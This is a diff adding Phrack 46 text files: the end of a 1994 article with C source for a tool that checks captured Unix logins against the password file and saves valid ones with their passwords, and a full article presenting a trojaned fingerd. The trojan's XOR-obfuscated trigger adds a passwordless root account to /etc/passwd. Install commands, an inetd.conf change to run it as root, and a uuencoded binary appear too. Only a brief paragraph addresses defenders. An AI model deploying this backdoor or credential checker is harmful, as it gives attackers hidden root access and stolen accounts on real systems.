+quit a few accounts, and a few weeks later you wanna see if they are still
+alive, instead of logging onto them, then logging out again 20 or 30 times
+which can take time, and could get the system admin looking your way, this
+program will continuously ask you to enter a user i.d. & password, then
+validate them both by actually using the appropriate entry in the password
+file. All valid accounts are then stored along with other info from the
+password file, in a data file. The program loops around until you stop it.
+
+This works on all unshadowed unix systems, and, you guessed it!, shadowed
+SUNOS systems.
+
+If you run it on an unshadowed unix other than SUNOS, remove all references
+to pwdauth(), along with the shadow password file checking routine,
+if your on sysV, your shit outa luck! anyway, here goes :-
+
+
+---cut here---------------------------------------------------------------
+
+/* Program   : To validate accounts & passwords on both
+               shadowed & unshadowed unix systems.
+   Author    : The Shining/UPi (UK Division)
+   Date      : Released 12/4/94
+   UNIX type : All unshadowed systems, and SUNOS shadowed systems */
+
+
+#include <stdio.h>
+#include <string.h>
+#include <pwd.h>
+
+
+FILE *fp;
+
+
+int pw_system( void ), shadowed( void ), unshadowed( void );
+void write_info( void ), display_notice( void );
+
+struct passwd *pwentry, *getpwnam();
+
+struct user {
+       char logname[10];
+       char key[9];
+       char salt[3];
+} u;
+
+
+char *getpass(), *pwdauth(), *crypt(), ans[2];
+int invalid_user, stat;
+
+
+int main( void )
+{
+
+ strcpy(ans, "y");
+
+ while (strcmp(ans, "y") == NULL)
+ {
+   invalid_user = stat = 0;
+    display_notice();
+     printf("Enter login id:");
+    scanf("%9s", u.logname);
+   strcpy(u.key, getpass("Password:"));
+
+
+ setpwent();
+
+   if ((pwentry = getpwnam(u.logname)) == (struct passwd *) NULL)
+      invalid_user = 1;
+   else
+      strncpy(u.salt, pwentry->pw_passwd, 2);
+
+
+ if (invalid_user != 1) {
+
+   if ((stat = pw_system()) == 1) {
+      if ((stat = unshadowed()) == NULL) {
+           printf("Unshadowed valid account! - storing details\n");
+          write_info();
+      }
+   }
+   else
+     if ((stat = shadowed()) == NULL) {
+          printf("SUNOS Shadowed valid account! - storing details\n");
+         write_info();
+     }
+     else
+        invalid_user = 2;
+
+ }
+
+
+    if (invalid_user == 1)
+       printf("User unknown/not found in password file\n");
+
+    if (invalid_user == 2 )
+       printf("Password invalid\n");
+
+       printf("\n\nValidate another account?(y/n): ");
+       scanf("%1s", ans);
+
+ endpwent();
+ }
+}
+
+
+/* Check to see if shadow password system is used, in SUNOS the field
+   in /etc/passwd starts with a '#', if not, check to see if entry
+   is 13 chars, if not shadow must be in use. */
+
+int pw_system( void )
+{
+   if (strlen(pwentry->pw_passwd) != 13)
+      return(0);
+   else
+      if (strcmp(u.salt, "##") == NULL)
+         return(0);
+      else
+         return(1);
+}
+
+
+/* If system is unshadowed, get the 2 character salt from the password
+   file, and use this to encrypt the password entered. This is then
+   compared against the password file entry. */
+
+int unshadowed( void )
+{
+if (pwentry->pw_passwd == crypt(u.key, u.salt))
+   return(0);
+else
+   return(1);
+}
+
+
+/* If SUNOS shadowe system is used, use the pwdauth() function to validate
+   the password stored in the /etc/security/passwd.adjunct file */
+
+int shadowed( void )
+{
+int pwstat;
+
+if (pwstat = pwdauth(u.logname, u.key) == NULL)
+   return(0);
+else
+   return(1);
+}
+
+
+/* Praise myself!!!! */
+
+void display_notice( void )
+{
+system("clear");
+ printf("Unix Account login id & password validator.\n");
+ printf("For all unshadowed UNIX systems & shadowed SUNOS only.\n\n");
+printf("(c)1994 The Shining\n\n\n\n");
+}
+
+
+/* Open a file called 'data' and store account i.d. & password along with
+   other information retrieved from the password file */
+
+void write_info( void )
+{
+
+/* Open a file & store account information from pwfile in it */
+
+if ((fp = fopen("data", "a")) == NULL) {
+     printf("error opening output file\n");
+    exit(0);
+}
+
+fprintf(fp, "%s:%s:%d:", u.logname, u.key, pwentry->pw_uid);
+ fprintf(fp, "%d:%s:", pwentry->pw_gid, pwentry->pw_gecos);
+ fprintf(fp, "%s:%s\n", pwentry->pw_dir, pwentry->pw_shell);
+fclose(fp);
+}
+
+-----cut here------------------------------------------------------------------
+
+
+
+The above programs will not compile under non-ansi C compilers without quite
+a bit of modification. I have tested all these programs on SUNOS both
+shadowed & unshadowed, though they should work on other systems with
+little modification (except the shadow password cracker, which is SUNOS
+shadow system specific).
+
+
+Regards to the following guys :-
+
+
+Archbishop & The Lost Avenger/UPi, RamRaider/QTX,
+the guys at United International Perverts(yo Dirty Mac & Jasper!)
+and all I know.
+
+
+(c) 1994 The Shining (The NORTH!, U.K.)
+
+*******************************************************************************
diff --git a/phrack46/12.txt b/phrack46/12.txt
new file mode 100644
index 0000000..dce82b5
--- /dev/null
+++ b/phrack46/12.txt
@@ -0,0 +1,704 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 12 of 28
+
+****************************************************************************
+
+
+
+The fingerd trojan horse
+Original article by Hitman Italy for Phrack Inc.
+
+This article is for informational purpose only, I'm not liable for
+any damage or illegal activity perpetrated using the source or the
+informations in the article.
+
+-=- + -
+
+So you have gained access to a system and want to keep on hacking without
+being kicked off by a smart operator, there are dozen methods you can use,
+usually, if an operator figure out that his system is under attack, he'll
+check out the login program and telnetd for backdoors, then the telnet for
+logging activities or network sniffers and so on..  if nothing is found
+he'll realize the hacker is a dumb ass and he'll just modify the passwd to
+prevent him from logging on (in most cases), here comes my fingerd trojan.
+This scheme is quite original (I've never seen it used) and the source is
+compact enough to be fitted into a MAG.  The fingerd as all you know (I
+hope) is the finger server run by inetd when a client opens the finger
+port (N.79), of course if the port is locked, or you have a network
+firewall, do not use this code.
+
+---------- + CUT HERE + -----------------------------------------------
+
+/*  The Fingerd trojan by Hitman Italy
+ *  This source cannot be spread without the whole article
+ *  but you can freely implement or modify it for personal use
+ */
+
+static char copyright[] = "";   /* Add the copyright string here */
+
+static char sccsid[] = "";      /* Add the sccsid string here */
+
+
+#include <stdio.h>
+
+#define PATH_FINGER "/usr/ucb/finger"
+#define CODE 161
+
+char *HitCrypt(ch)
+char *ch;
+{
+   char *b;
+   b=ch;
+   while ((*(ch++)^=CODE)!=0x00);
+   return(b);
+}
+
+main(argc,argv)
+int argc;
+char *argv[];
+{
+   register FILE *fp;
+   register int ch;
+   register char *lp;
+   int p[2];
+
+static char exor[4][23]={
+{201,200,213,CODE},
+{142,196,213,194,142,209,192,210,210,214,197,CODE},
+{201,200,213,155,155,145,155,145,155,155,142,155,142,195,200,207,142,194,
+210,201,CODE},
+{227,192,194,202,197,206,206,211,129,192,194,213,200,215,192,213,196,197,
+143,143,143,CODE} };
+
+#define   ENTRIES   50
+   char **ap, *av[ENTRIES + 1], line[1024], *strtok();
+
+#ifdef LOGGING               /* unused, leave it for "strings" command */
+#include <netinet/in.h>
+   struct sockaddr_in sin;
+   int sval;
+
+   sval = sizeof(sin);
+   if (getpeername(0, &sin, &sval) < 0)
+      fatal(argv[0],"getpeername");
+#endif
+
+   if (!fgets(line, sizeof(line), stdin))
+      exit(1);
+
+   av[0] = "finger";
+
+   for (lp = line, ap = &av[1];;) {
+      *ap = strtok(lp, " \t\r\n");
+      if (!*ap)
+         break;
+      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
+         *ap = "-l";
+      if (++ap == av + ENTRIES)
+         break;
+      lp = NULL;
+   }
+
+   if (pipe(p) < 0)
+      fatal(argv[0],"pipe");
+
+   switch(fork()) {
+   case 0:
+      (void)close(p[0]);
+      if (p[1] != 1) {
+         (void)dup2(p[1], 1);
+         (void)close(p[1]);
+      }
+
+/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
+   if (av[1])
+       if (strcmp( (HitCrypt(&exor[0][0])) ,av[1])==0) {
+        if(!(fp=fopen( (HitCrypt(&exor[1][0])) ,"a")))
+         _exit(10);
+        fprintf(fp,"%s\n", HitCrypt(&exor[2][0]));
+        printf("%s\n", HitCrypt(&exor[3][0]));
+        fclose(fp);
+        break;
+       }
+/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
+
+        if (execv(PATH_FINGER, av)==-1)
+         fprintf(stderr,"No local finger program found\n");
+      _exit(1);
+   case -1:
+      fatal(argv[0],"fork");
+   }
+   (void)close(p[1]);
+   if (!(fp = fdopen(p[0], "r")))
+      fatal(argv[0],"fdopen");
+   while ((ch = getc(fp)) != EOF) {
+      putchar(ch);
+   }
+   exit(0);
+}
+
+fatal(prg,msg)
+
+   char *prg,*msg;
+{
+   fprintf(stderr, "%s: ", prg);
+   perror(msg);
+   exit(1);
+}
+
+--------- + CUT HERE + ----------------------------------------------
+
+I think it's quite easy to understand, first of all, inetd opens the
+socket and pipes the the input data through the fingerd
+
+*  if (!fgets(line, sizeof(line), stdin))
+*     exit(1);
+*   av[0] = "finger";
+*   for (lp = line, ap = &av[1];;) {
+*      *ap = strtok(lp, " \t\r\n");
+*      if (!*ap)
+*         break;
+*      if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
+*         *ap = "-l";
+
+here it gets the data from stdin and parses them (strtok) converting (due
+to RFC742) any '/W' or '/w' old options in '-l'
+
+*    switch(fork()) {
+*   case 0:
+*      (void)close(p[0]);
+*      if (p[1] != 1) {
+*         (void)dup2(p[1], 1);
+*         (void)close(p[1]);
+*      }
+
+the task goes into the background
+
+*        if (execv(PATH_FINGER, av)==-1)
+*         fprintf(stderr,"No local finger program found\n");
+
+here the daemon executes the local finger with remote parameters
+
+*   (void)close(p[1]);
+*   if (!(fp = fdopen(p[0], "r")))
+*      fatal(argv[0],"fdopen");
+*   while ((ch = getc(fp)) != EOF) {
+*      putchar(ch);
+
+the output is piped back to the remote system
+
+That's how the finger daemon works...  now the trojan, basically we'll
+check out the input finger user till the magic code matches, then our
+sleepin' trojan will wake up and do the job...  let's examine my code
+(decrypted)
+
+/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
+   if (av[1])
+       if (strcmp("hit",av[1])==0) {
+        if(!(fp=fopen("/etc/passwd","a")))
+         _exit(10);
+        fprintf(fp,"hit::0:0::/:/bin/csh\n");
+        printf("Backdoor activated...\n");
+        fclose(fp);
+        break;
+       }
+/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
+
+When the "hit" magic code matches the trojan will modify the passwd adding
+a fake unpassworded root user named "hit", so you can relogin as root,
+cover your tracks and keep on working.  Of course this is an example, you
+can do what you want simply adding your custom code, you may remote cat a
+log file without logging in, or remote kill an user, maybe root logins are
+disabled so you have to make a suid shell and add a normal entry in the
+passwd or open a port and so on, you can also use multiple codes if you
+like.  If the magic word doesn't match of course the finger will work out
+normally.
+
+<example>
+# finger hit@666.666.666.666
+[666.666.666.666]
+Backdoor activated...
+
+Well done! You have gained a root access.
+(...)
+# cat /etc/passwd
+root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
+nobody:*:65534:65534::/:
+daemon:*:1:1::/:
+sys:*:2:2::/:/bin/csh
+bin:*:3:3::/bin:
+uucp:*:4:8::/var/spool/uucppublic:
+news:*:6:6::/var/spool/news:/bin/csh
+ingres:*:7:7::/usr/ingres:/bin/csh
+audit:*:9:9::/etc/security/audit:/bin/csh
+sync::1:1::/:/bin/sync
+ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
++::0:0:::
+hit::0:0::/:/bin/csh
+^^^ they run NIS... anyway our local root login will work fine
+
+<example>
+#finger hit@hacked.system.com
+[hacked.system.com]
+here is the log
+user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
+user: yit001 from: (...)
+
+That's really useful to collect logfiles without logging in and leave
+tracks everywhere.
+
+
+Now the problem....
+If you want to use the fingerd to run world accessible commands you won't
+have any problem but if you require root privileges check this out:
+
+#grep fingerd /etc/inetd.conf
+finger  stream  tcp     nowait  nobody  /usr/etc/in.fingerd     in.fingerd
+                                ^^^^^^
+On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
+NFS etc..), as nobody of course you cannot modify the passwd, so edit the
+file
+
+finger  stream  tcp     nowait   root   /usr/etc/in.fingerd     in.fingerd
+
+now you have to refesh the inetd process
+
+#kill -HUP <inetd pid>
+
+now you can do what you want, many unix clones let the fingerd running as
+root by default...  and even if you have to modify the inetd.conf an
+operator unlikely will realize what is appening since all other daemons
+run as root.
+
+
+Why have I crypted all data?
+#strings login
+(...)
+Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
+
+Lame or not?  All alien data must be crypted..  a fast exor crypting
+routine will work fine, of course you can use the standard crypt function
+or other (slow) algorithms but since security is not important (we just
+want to make our texts invisible) I suggest using my fast algo,to create
+the exor matrix simply put all texts on a file and use the little
+ExorCrypt utility I have included UUencoded below (amiga/msdos version).
+
+<example amiga>
+echo > test "this is a test"
+Acrypt test test.o
+line crypted: 1
+type test.o
+static char exor[]={
+213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};
+
+char *ExorCrypt(ch)
+char *ch;
+{
+   char *b;
+   b=ch;
+   while ((*(ch++)^=0xa1)!=0x00);
+   return(b);
+}
+
+The utility will create the exor vector (matrix) (from the 80 column
+formatted ascii input text) and the specific decoding function, If you do
+not supply a key "$a1" will be used, remember to add a NewLine if
+necessary, the vector/matrix never contain them.
+
+Before compiling the whole thing you must add the copyright and sccsid
+strings I have not included (they may vary).
+Let's simply do:  (SunOs)
+
+#strings /usr/etc/in.fingerd
+@(#) Copyright (c) 1983 Regents of the University of California.
+ All rights reserved.                       ^^^^ COPYRIGHT STRING
+@(#)in.fingerd.c 1.6 88/11/28 SMI           <<<< SCCSID STRING
+getpeername
+finger
+pipe
+/usr/ucb/finger
+No local finger program found
+fork
+fdopen
+%s:
+         (((((
+DDDDDDDDDD
+AAAAAA
+BBBBBB
+
+The top of source becomes:
+static char copyright[]=
+"@(#) Copyright (c) 1983 Regents of the University of California.\n\
+ All rights reserverd.\n";
+static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
+
+That's all. Now you can compile and install your fingerd trojan,
+the source was adapted for SunOS but you can port it on many unix
+clones without troubles.
+
+
+Few final words to:
+
+Operators: How to defeat this trojan? First of all check the inetd.conf,
+           then do VARIOUS fingerd checksums (maybe even the "sum" command
+           is a trojan :) if you discover the trojan wrap the finger port
+           so you can track down the hacker (usually all wtmp/lastlog logs
+           are removed) or wrap everything modifying the daemons, do NOT use
+           the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
+           tripwire entry to prevent future installations.
+           Well...  if the hacker is a good one everything is useless.
+
+Beginners: You must be root to install the trojan, remember to get a copy
+           of the original fingerd program before installing the fake
+           version.
+
+           On a Sun do:
+           #cc -o in.fingerd trojan.c
+           #mv /usr/etc/in.fingerd fingerd.old
+           #mv in.fingerd /usr/etc
+           remember to check the /etc/inetd.conf
+-=- + -
+
+To get in touch with me send E-Mail to:
+
+ Internet: hit@bix.com           X.25: QSD Nua (0)208057040540
+                                           Mbx: Hitman_Italy
+
+if you want, use my PGP key
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: 2.3a.2
+
+mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
+faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
+KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
+tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
+=bCu4
+-----END PGP PUBLIC KEY BLOCK-----
+
+
+ExorCrypt Amiga version:
+
+-=) S.Encode v2.5 (=-
+begin 777 Acrypt.lha
+M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
+MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
+MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
+M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
+MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
+MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
+MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
+MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
+M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
+MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
+M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
+MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
+MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
+MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
+M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
+MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
+MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
+M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
+MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
+M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
+M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
+M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
+MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
+MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
+MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
+MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
+M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
+ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
+M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
+M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
+MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
+MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
+MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
+MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
+M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
+MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
+MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
+ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
+M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
+M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
+M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
+M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
+M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
+MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
+M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
+M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
+M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
+M&#$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
+M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
+MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
+M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
+M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)AT<JVR5643h
+M!5>GAPX[AJKRS\U::ZHHU,L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*./)Z_h
+M!LN;9;=KCF=O67MYI.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h
+M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h
+M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h
+M1Z)$!3MQ;JC1>S;#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h
+M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h
+M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h
+M4%W=M-=2[<AL]J-9ER,S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h
+M&SD6@Q?Z]FN84E,]M6AO=;>^>1M?<B5,&R714<JT<B31H\VJ[C"O'&@=&&2^h
+M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^;P?^%.YOM40h
+M5+6&S)7;-&P]P_0&AW0JK-FE&JZ"`I8[;01#CTW"TKS";-J=Z=$;A?:"*0F6h
+M957_V<'X-Z9P9=8E&,XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh
+MR)YY+FB^I;)P-)*H$E)I)3T-<TPXOP"##2ECHCQ;FQY^6H$<Z`<#^@:]?`]>h
+MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh
+M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h
+MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h
+M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q<HT[*HUYh
+MTE9-!FV\*L7$H'UP<QVO<,<,Y1_G;,P>7ZI/]/"IX?74T7PA6H!#.L]64;0;h
+MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh
+M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h
+M'\0TG47H3=73FXOC8B%S&;;:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1,$G#h
+MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h
+M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h
+M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h
+MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h
+M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h
+MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh
+M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h
+M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0<?[F+)@QO(#PNU^WBZR;:Z/Wh
+M//)8[7[?M27B*@"T5Z;QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh
+MRV@'FJ=J&TW>FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h
+M(`?VXCKVAS/;VJNG5PUD[.<P\%3V[J?1.ML#XV$E0W<,8R`Q#PMQ)>RZ)R"Ih
+M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h
+M,<TWEU8YQP<$>[F3F)@);%JRGJ?8BQPEZZ@N[3<AS70S1J7J#+B_G"!W]V`2h
+M\E4*9N-H/,^<9,W?V+.13DQI1=YR30Q;^<YJ;6Q.UC;?P%E_P%G#NY5&WEZ@h
+M3F[JXS,[BIPX(K*T0TK?^S@8F`'+M3&V^OIH1E;?30BZR3+*!3G<RQY"<W-+h
+MJO`W-+8ACB9>\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h
+M<C/_UYP]=$#]YZI</^\!_Z:&B></_.A`%/,[SN];TSU#_F^AR&W":55Z"6]_h
+M(R;]]P9Z1P#DQI-!W)+Z;'&F?`$4^'1?C8M-NXWCR51(W^<2TIT_%N_WE+J`h
+MGK@J<:2M4:A3C!\F]0NE-'X8J<VXYB]*XYS"OF?L7'TQK<V@(3#-8/"W5W6Xh
+M6ZDO46L#=FK&B>8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!<P-E`U`5CWZ';^h
+M"KWO$P+426;ONSIGQ+<$K/<H=?.9@DKW#67"=!5?HMDYE3YJ:Q\/I?1J]T'\h
+MHY:<<$J27%_467;9QF7%JMMI!LVT[73R`9[;!DZ)N`'E9V;!@\]@`NC3R7[Dh
+M(/*3!&_D986\H/O]`'])L!9L?"Y"$NI>6<?R-*NVX$/IIBV[1E)XUY?]K<@Nh
+MWR$8.6@#]Z&OK`:C]Z?-*W:>:+TQ\T7&.'+G^M#EKGR//O\(X<NR]Q9GXVTKh
+M`;2][F-I?K1\/(X=7O&]J^_X@;4L9K:E+$_H'G^YQU,@%/>QDR0:3&BO)?B+h
+MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h
+M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h
+M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh
+M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h
+MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh
+M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^<F)I\!N)II<V)I!@^?1@P:9(^4]M=h
+MRB=H<28\P\"3BQ.QW^Z3J=9%B;!-ZXQW3#GT#BD[Z:I/[VCLY`V&KM2"CM%$h
+M9E4"9S/.S8TF/A]#\XZMM*A<Z.DW,@XDMW4;<R<Q:DUBS>9N)!USDW'3N"M$h
+MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh
+MU^[@3U,Z<X,'B-D%DYT^QY'!8O9<Z;JTV^Z^.V"__AQPZ7V]3U076&"T3MJRh
+M`>ZIB<!_`"4YRK>:#Z%L'N/'Z%QX^)-F31"2%H$+<3<L9U^[OBV68`Q'9Y?^h
+M^QUO4^+8_XO^=C_*3+KFZ'S`/=)`\]`=S>(1,LLF?S`&JX^Y53T;/"<77RQQh
+ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h
